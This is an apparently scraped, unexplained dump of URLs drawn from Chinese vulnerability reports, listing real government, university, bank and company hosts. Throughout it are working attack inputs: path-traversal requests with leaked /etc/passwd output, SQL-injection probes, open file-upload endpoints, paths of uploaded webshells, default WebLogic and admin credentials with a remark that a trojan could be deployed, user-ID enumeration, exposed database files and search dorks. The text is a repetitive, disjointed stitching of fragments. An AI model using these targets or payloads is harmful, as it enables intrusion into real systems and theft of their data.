www.bjbet.cn)位于北京市海淀区中关村科技园区,是一家快速发展的高新技术企业。 http://www.bjbet.cn/web!newsInfo.action http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFirst.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFirst.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFirst.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFirst.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemFirst.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFirst.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFirst.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFourth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFourth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFourth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFourth.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemFourth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFourth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFourth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFourth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFourth.aspx?id=1 http://220.181.105.88:9080/ http://v30.sosgps.net.cn/systemindex.do http://175.45.7.217:9070/mywo/loginAction.action http://www.fslib.com.cn/oldfslib/FslibInfo/Tribe/view.asp?ID=289 http://chjw.njau.edu.cn/showinfo.asp?id=728 http://zyz.sdemo.gov.cn/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemSixth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemSixth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemSixth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemSixth.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemSixth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemSixth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemSixth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemSixth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemSixth.aspx?id=1 http://61.133.119.187:8091/symItemView/ItemSecond.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemSecond.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemSecond.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemSecond.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemSecond.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemSecond.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemSecond.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemSecond.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemSecond.aspx?id=1 www.gyebank.com http://www.gtjaqh.com/gtjafe/jsp/calendar/dealCalendar.action http://www.10010nm.com/myorder/searchOrderDetail.action?orderid=1309134219 http://mail.scihc.net/editor/filemanager/upload/php/upload.php http://mail.cdzk.org:8888/editor/filemanager/connectors/php/upload.php http://mail.scihc.net/editor/filemanager/upload/php/upload.php http://mail.ziyang.gov.cn/editor/filemanager/upload/php/upload.php http://oa.chinacrt.com/editor/filemanager/connectors/php/upload.php http://mail.cngy.gov.cn:8888/editor/filemanager/upload/php/upload.php https://mail.ichengsi.com:4443/editor/filemanager/upload/php/upload.php http://mail.ccpc.cq.cn/editor/filemanager/connectors/php/upload.php http://mail.ksitri.com/editor/filemanager/connectors/php/upload.php http://mail.smjy.net//editor/filemanager/upload/php/upload.php http://mail.sztour.com.cn//editor/filemanager/connectors/php/upload.php http://www.100fen.com/editor/filemanager/connectors/php/upload.php http://gmail.njx.cn/editor/filemanager/connectors/php/upload.php http://222.208.63.35/editor/filemanager/upload/php/upload.php http://mail.shenzhougroup.com//editor/filemanager/connectors/php/upload.php http://newspaper.jinchengbank.com/editor/filemanager/connectors/php/upload.php http://mail.scihc.net/editor/filemanager/upload/php/upload.php?Type=Media http://kf.07073.com/ http://i.epoint.com.cn/EpointWeb/RegisterUser/forgetPassword.aspx http://www.zjlib.cn/shutui/shownews.asp?id=25 http://guanggao.guoshi.com/teacher/admin/login.php http://202.96.67.34/corporate/webpages/login.jsp http://www.tongda2000.com/oa/group/ http://www.day900.com/ inurl:web_meeting/index.php http://huizhi2000.xicp.net/common/web_meeting/index.php?module=join_meeting&userId=1&siteId=10 http://admin.keruyun.com/.svn/entries http://admin.keruyun.com/loginmn.php http://12094.mmb.cn/wap/touch/user/member/inputCheckCode.jsp http://www.ycks.gov.cn/msg.php?id=6388 http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=******&classId=******&ut=t country:China http://111.39.38.135:81/ http://huodong.tiancity.com http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemThird.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemThird.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemThird.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemThird.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemThird.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemThird.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemThird.aspx?id=1 http://111.1.6.10/login.do http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://jiaowu.hustwenhua.net/jwxs/login.asp http://xscx.cmcedu.cn/jwxs/login.asp http://jwxt.hycgy.com:5000/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://www.ync365.com http://www.ync365.com/resetPassword.php?act=default&type=users www.ync365.com www.ync365.com inurl:viewreturn.asp http://www.2000textile.com/viewreturn.asp http://www.szluozuan.com/viewreturn.asp http://www.yixiuf.com/viewreturn.asp http://www.lyfanjiang.com/viewreturn.asp http://www.itemai.com/viewreturn.asp http://www.vipasp.com inurl:cat.asp?catid= http://www.nnfyz.com/shop2/mess.asp http://www.stoneups.com.cn/mess.asp http://www.dxsdbbt.com/mess.asp http://www.10bags.com/shop60/mess.asp http://www.hcgpk.com/mess.asp http://222.211.94.7:8080/ http://toutiao.com/a3735350279/ http://221.130.137.33:81/wsyj/private/login.xp http://61.133.142.90/hfcg/private/login.xp http://60.166.60.60:8088/fdwsyj/private/login.xp http://220.178.102.142/lzReport/private/login.xp http://www.wstka.com/ebank/ebank/login.xp http://61.133.142.90/hfcg/private/login.xp http://27.54.228.74:8088/hfss/private/login.xp http://221.130.137.33:81/wsyj/private/login.xp http://60.166.60.60:8088/fdwsyj/private/login.xp http://220.178.60.10:6001/fxwsyj/private/login.xp http://218.23.112.74:81/cfwsyj/private/login.xp http://221.130.137.33:82/yhwsyj/private/login.xp http://220.180.238.128:8002/sswsyj/private/login.xp http://221.130.137.33:81/bhwsyj/private/login.xp http://zwgk.hefei.gov.cn/zwgk/private/login.xp http://220.178.49.19/qgjx/private/login.xp http://183.166.59.231:8080/hn_szrx/private/login.xp http://www.hfswj.gov.cn/hfbusiness/private/login.xp http://www.ahmg.gov.cn:9999/login.xp http://220.178.102.142/lzReport/private/login.xp http://www.wstka.com/ebank/ebank/login.xp http://120.210.74.12/easygoal/login.xp http://zyfw.hefei.gov.cn/wmb/private/login.xp http://61.133.142.58/xmscoa/private/login.xp http://www.029ly.cn/order/order.jsp?info_id=7087274 http://www.shanhaitian.net/order/order.jsp?info_id=7275941 http://www.liuliuka.com/order/order.jsp?info_id=7127739 http://www.yungusi.com/order/order.jsp?info_id=7405780 http://www.xlcholiday.com/order/order.jsp?info_id=7443382 http://www.playzhuhai.com/order.jsp?info_id=7412609 http://www.haolvyou.cn/order/order.jsp?info_id=5966371 http://www.51704.com/order/order.jsp?info_id=7134981 http://www.80000t.com/order/order.jsp?info_id=7388741 http://www.youjiaguolv.com/order/order.jsp?info_id=7397742 http://www.bjiub.com/order/order.jsp?info_id=7531163 http://www.bjiub.com/order/order.jsp?info_id=7531163 http://www.youjiaguolv.com/order/order.jsp?info_id=7397742 http://www.nongyou.com.cn/ http://222.135.76.147:8200/symItemManage/ItemForth.aspx?id=11 http://222.135.127.190:7200/symItemManage/ItemForth.aspx?id=11 http://221.2.149.47:8200/symItemManage/ItemForth.aspx?id=11 http://218.59.205.41:8053/symItemManage/ItemForth.aspx?id=11 http://jwh.tanljgzx.gov.cn/symItemManage/ItemForth.aspx?id=11 http://221.2.171.59:8200/symItemManage/ItemForth.aspx?id=11 http://218.56.159.98:8001/symItemManage/ItemForth.aspx?id=11 http://123.134.189.60:8016/symItemManage/ItemForth.aspx?id=11 http://www.shanghailima.com/admin/login.aspx https://www.lantian.gov.cn/func/web_main/display/frame/main http://piao.5iwuxi.cn/show_prod.jsp?info_id=7547904 http://menpiao.czyts.net/show_prod.jsp?info_id=7308733 http://www.playzhuhai.com/show_prod.jsp?info_id=7412619 http://mp.dreams-travel.com/show_prod.jsp?info_id=7310340 http://6666.aipiaoke.com/show_prod.jsp?info_id=7309038 http://mp.yoyoo.sh.cn/show_prod.jsp?info_id=6026600 http://www.booking4u.cn/show_prod.jsp?info_id=6019974 http://ticket.cadacac.com/show_prod.jsp?info_id=7410565 http://piaowu.qianggen.com/show_prod.jsp?info_id=7308989 http://menpiao.wxchunqiu.com/show_prod.jsp?info_id=7308839 http://mp.cctsh.com/show_prod.jsp?info_id=6026427 http://mp.cctsh.com/show_prod.jsp?info_id=6026427 http://menpiao.wxchunqiu.com/show_prod.jsp?info_id=7308839 http://183.62.232.65:800/zentao/my/ http://www.ciccphoto.com/ http://www.ciccphoto.com:80/center/json/returnCityeList?&redirect:xxx${13579246-1 http://fb.itools.cn/ http://data.99.com/ http://data.99.com/admin/RelationMenu.aspx?MenuID=1 http://122.227.148.185:8080/agent http://122.227.148.185:8080/console/,用户名密码是weblogic/weblogic1,可部署war木马,发现漏洞后,没进一步测试。 http://rumor.nownews.com/pro/get_hot.php?st=0&sk=2%20and%201=2&sd=0&pages=30&pageno=0&jsoncallback=jQuery16104215633808635175_1427043938655&_=1427044024528 rumor.nownews.com/pro/get_examine.php?st=1&sk=1&ss=3&pages=30&pageno=0&jsoncallback=jQuery16104895329086518111_1427044233726&_=1427044239989 http://pad.101.com/ http://mall.pad.101.com/ http://mall.pad.101.com/attached/image/feedbacks/201503231458_wooyun.jsp http://job.anjuke.com/resume/edit/?resume_id=3,参数resume_id可遍历,遍历后可以看到不同用户简历信息,经测试只有含测试数据在内7条数据,可能刚上线不久 http://bhyfsyjd.buaa.edu.cn/)存在命令执行漏洞,可远程获取系统管理权限。 http://wooyun.org/bugs/wooyun-2010-034715 http://wap.vanho.cn/index.action http://www.ugift.com.cn/ReviewOrder.action?orderType=1&orderId=1 http://www.ugift.com.cn/ReviewOrder.action?orderType=1&orderId=7873 http://down.chinaz.com/soft/34793.htm inurl:area.asp http://pos.sy1788.com//data/3gushop.mdb http://www.nxfzc.com/data/3gushop.mdb http://www.007cr.com//data/3gushop.mdb http://www.meifas.com//data/3gushop.mdb http://cn781238.124110.168.bz//data/3gushop.mdb http://www.cnzisha.cn//data/3gushop.mdb http://www.yaotiao51.com//data/3gushop.mdb http://nzxmxb.quxint.com//data/3gushop.mdb http://mall.pad.101.com/manage/admin.jsp inurl:index.php?shownews- http://static.wooyun.org/wooyun/upload/201503/14214138680ee3f512bd981d4db57e2370306716.jpg http://static.wooyun.org/wooyun/upload/201503/14214301df83b12c23953d81fdc3d9e0c5002662.jpg http://www.maspf.gov.cn/siteserver/login.aspx http://119.254.70.48:8080/hcm/usr/loginLdap.action http://dgdz.xzit.edu.cn/model/twogradepage/equipmentlist.aspx?columnId=243 http://yqgx.zstu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E6%80%BB%E5%8A%A1%E5%A4%84 http://yq.hqu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://59.69.101.10/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%C3%A6%C2%9D%C2%90%C3%A6%C2%96%C2%99%C3%A5%C2%AD%C2%A6%C3%A9%C2%99%C2%A2 http://labch.cumt.edu.cn:81/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=材料学院 http://dxsb.qfnu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://lab.hutc.zj.cn:8070/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://clpt.ecust.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://210.36.17.227/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://121.192.178.138/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://down.chinaz.com/soft/34793.htm http://www.em.gxnu.edu.cn/about.php?id=1 http://www.weirongdai.com/bbs/admin.php http://www.weirongdai.com/phpmyadmin/index.php http://www.kesion.com/Product/ http://down.chinaz.com/soft/30486.htm inurl:dir_url.asp?id= http://www.nbjbtsyey.com/dir_url.asp?id=12 http://www.zhusiarts.com/dir_url.asp?id=21 http://www.jd19s.com/dir_url.asp?id=23 http://www.jmxjjb.com/dir_url.asp?id=2 http://www.szakpx.com/dir_url.asp?id=22 http://www.nbjbtsyey.com/dir_url.asp?id=12 http://www.fjzzedu.com/dir_url.asp?id=21 http://www.hbxwedu.cn/dir_url.asp?id=21 www.lavago.com http://yk.csm.91160.com, http://ting.zhangyue.com/360/recommand?id=22 http://ah2.zhangyue.com/info.php http://114.255.123.95/hot/hosp_list_by_topic.htm?channelId=115 http://bbs.kaoyancn.com/config/.config_ucenter.php.swp http://login.lianjia.com/login/register?redirect=http://user.lianjia.com/ http://**.**.**/login/login.htm http://202.108.49.130/ltzx/sc_index.asp?keyword=1 http://www.day900.com/ http://360.zhangyue.com/zybook/u/p/book.php?key=4B4%27#id4 http://weizhonggou.com/goods_list/17_0_0 http://weizhonggou.com/goods/206515 http://110.249.253.5:8000/login.action http://www.czpost.com.cn/index.asp www.czpost.com.cn http://www.czpost.com.cn http://www.smeyl.gov.cn/smeyl.rar http://www.smeyl.gov.cn/phpmyadmin/ http://www.smeyl.gov.cn/bab.php http://qhd.cstor.cn http://www.gdiot.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.gdiot.cn/phpmyadmin/ http://tv.tcl.com http://ad.toutiao.com/ http://ad.toutiao.com/ad/lingyun_create_site/?type=1 http://42.96.190.138/index.php?m=Activity&a=finish&catid=55122&id=603&isajax=1 http://42.96.190.138/index.php?m=Coupon&a=update&id=5 http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/Init_signature.jsp http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/DownloadFile.web?fileName=/etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/DownloadFile.web?fileName=/etc/ftpusers http://m2.people.cn/apps/weixin_share/s.php?id=MTM= http://m2.people.cn/apps/weixin_share/s.php?id=MTM= url:http://161.207.5.195/NASApp/cpf/distribute/index.jsp http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/host feee:2b7f http://218.30.105.75/soufun/ admin:admin http://218.70.110.252/Login.aspx?ReturnUrl=%2fDefault.aspx http://218.70.110.252 http://www.day900.com/ http://www.day900.com/general/crm/apps/crm/include/search.php?ENTITY=crm_marketing&PAGE_SIZE=10&CUR_PAGE=&ORDERFIELD=&ORDERTYPE=&USER_VIEW=1706 payload:ENTITY=crm_marketing http://www.day900.com http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random http://amd.scnu.edu.cn/eam/homepage/home/viewCenterframe.jsp?id=49000&type=5%27 http://115.28.252.161/admin/ url:http://barcode.bgp.com.cn:8090/index http://url/Aspx/HelpCenter/AskAnswer.aspx http://218.65.66.77:81/Default.aspx?pagetype=wzjz&casetype=7 http://111.75.190.101:90/ http://218.3.44.194/ http://sgaj.aps.gov.cn/ http://bsdt.jxfzgaj.gov.cn/ http://elearning.corp.elong.com/Showknowledge.aspx?id=214 http://www.day900.com/ http://www.chre.cn/qywh/qywh.asp?classid=004001%27 http://www.day900.com/ http://jmzx.xmedu.cn:9999/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.gxbyzx.cn:88/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://szxx.pudong-edu.sh.cn/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://218.78.241.80/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.xwgjzx.com:8888/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.ligchina.com.cn/news/news.asp?newsid=0 http://218.59.228.162/wscgsxxcx/login.do?mm=1&state=&type=dl&yhdh=1 http://123.130.246.26:9080/qszxyw/bljsz.do url:http://hotels.yonyou.com/ajax_action/get_index_lable?cityid=0101&type=135 http://app.info.hc360.com/design/login.aspx http://app.info.hc360.com http://jsw.e-health.org.cn/resin-admin/status.php http://jsw.e-health.org.cn/resin-doc/examples/db-jdbc/viewfile?file=WEB-INF/resin-web.xml http://jsw.e-health.org.cn/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp http://b2b.haier.com:80/ http://www.zjpost.com//gift/loginAction.action www.zjpost.com/loadNewsListInFront.do www.zjpost.com/loadNewsListInFront.do http://61.191.25.24/edit/attached/ http://61.191.25.24/upload/ http://202.108.99.81/article/Article!detailArt.action http://life.cyberway.net.cn/community?name=a http://sqlmap.org http://jys.zjedu.org/jxyj.aspx?type=45&&type_=87 http://www.tjportnet.com/member/index.jsp http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://218.78.241.80/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://www.xwgjzx.com:8888/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1s http://www.wl96345.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?Code=07 http://www.cn96345.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?Code=17 http://www.yjhl12312.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?code=17 http://12345.jxfz.gov.cn/InteractiveWeb/Enterprise/Default.aspx?Code=01 http://www.lq96345.cn/Enterprise/Default.aspx?Code=006 http://www.mzmzj.gov.cn/aboutme.asp?id=5 http://www.vjianke.com/VQLTS.clip http://www.520hzty.com,以其为例 http://www.520hzty.com//Manage/ http://www.520hzty.com//Manage/Admin/AddMenus http://www.520hzty.com//Manage/Admin/MenusList http://www.520hzty.com//Manage/admin/SiteSetting http://www.520hzty.com//Manage/CheckUser/List http://www.520hzty.com//Manage/admin/RoleList http://www.520hzty.com/Manage/admin/ModifyPower/1 http://www.520hzty.com/Manage/admin/ModifyPower/29 http://www.520hzty.com/Manage/admin/ModifyPower/30 http://www.520hzty.com/Manage/admin/ModifyPower/31 http://www.520hzty.com/Manage/admin/ModifyPower/20 http://www.520hzty.com/Manage/AlbumInfo/List http://www.520hzty.com/Manage/AlbumInfo/List http://www.520hzty.com/Manage/Base/UpLoadImg http://www.520hzty.com/Upload/2015-03/20150323220318.asp http://www.520hzty.com/Upload/2015-03/20150323222147.asp http://www.dcyjw.com.cn/Manage//AlbumInfo/List http://www.dcyjw.com.cn//Upload/ImgFile/2015-03/20150323224607.asp http://www.hzttxx.com/Manage//AlbumInfo/List http://www.hzttxx.com/Upload/ImgFile/2015-03/20150323225250.asp http://www.hzttxx.com/Upload/ImgFile/2015-03/20150323225548.aspx http://www.lhgkids.com//Manage//AlbumInfo/List http://www.slxx.cn/manage//AlbumInfo/List http://www.yhcxey.com//manage//AlbumInfo/List http://www.520hzty.com//Manage/AlbumInfo/List http://www.lanxixxxx.com/Manage/AlbumInfo/List http://ywdtxx.com/Manage/AlbumInfo/List http://www.fyfcsy.com//Manage/AlbumInfo/List http://www.jsshtxx.com/Manage/AlbumInfo/List inurl:8080/rcc/ http://egov.pzhzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zggjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.fszw.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.eyqzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.hyzwfw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.pczw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zyyjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://www.shzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.qczw.gov.cn:8080/rcc/review_insert.jsp http://egov.wangcangzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zgzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.jgzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.wyzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://www.zyjyzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.glzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.guang-an.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.ajzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.xhzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.scdongqu.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.sclzzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.neijiangshizhongqu.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.lxzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.guanghan.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.lzzwfw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.hjxzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zggjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 cn:8080 http://egov.zggjzw.gov.cn:8080 http://202.103.211.14/ http://*/inc/downfj.asp,无意中发现,文章中的附件下载地址是这样的,http://hzymjx.com/inc/downfj.asp?path=/media/down/Web/source/Other/GoogleEarthWin_final.zip&filename=GoogleEarthWin_final.zip http://hzymjx.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/downfj.asp&filename=downfj.asp http://yhslxx.yd-jxt.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/downfj.asp&filename=downfj.asp http://tlyzxx.yd-jxt.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://www.yhslxx.net/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://jtyey.ysxqjy.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://www.hzydxx.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://pacz.pa18.com/pacz_core/do/oea/loadNasFile?fileType=png&folder=qrCode.productInfo.nas&fileName=../../../../../../../../../../../../../../etc/passwd http://222.180.195.50/login.do http://www.app365.com/ http://www.app365.com/common/customer.jhtml http://cwy.cyberway.net.cn/ http://cp.cyberway.net.cn/ http://pv.semi.org.cn/ads/adsclick.action http://e.cyberway.net.cn/login.action http://cloud.suning.com/cloud-web/versionUpdateByType.htm?platform=IOS_HD http://cloud.suning.com/cloud-web/versionUpdateByType http://sqlmap.org http://www.hfxzzx.gov.cn/admin.action http://www.frontop.cn/lywm/ http://edu.chanjet.com/new/index.php?user-app-login https://github.com/denghualiang/educhanjet http://www.app365.com/ http://www.app365.com/common/customer.jhtml http://www.hzzoy.com/ http://www.caa123.org.cn/frontnoOrderAction.do?method=frontOrderDetail&orderId=1160000 http://www.caa123.org.cn/frontnoOrderAction.do?method=frontOrderDetail&orderId=1240600 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.o2bra.com.cn/api/user_addresses?user_id=58936 http://www.o2bra.com.cn/api/follows/my?user_id=1 http://www.o2bra.com.cn/api/user_contacts?user_id=58936 http://www.woh.com.cn/bbs/user/userDetails.jsp?userName= http://www.woh.com.cn/bbs/user/userDetails.jsp?userName= http://sqlmap.org http://114.251.197.194/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.uniscope.com/ http://www.uniscope.com/admin.php zlgc.sicnu.edu.cn/master/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://ds.cpf.com.cn/NASApp/cpf/distribute/index.jsp http://ds.cpf.com.cn/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd 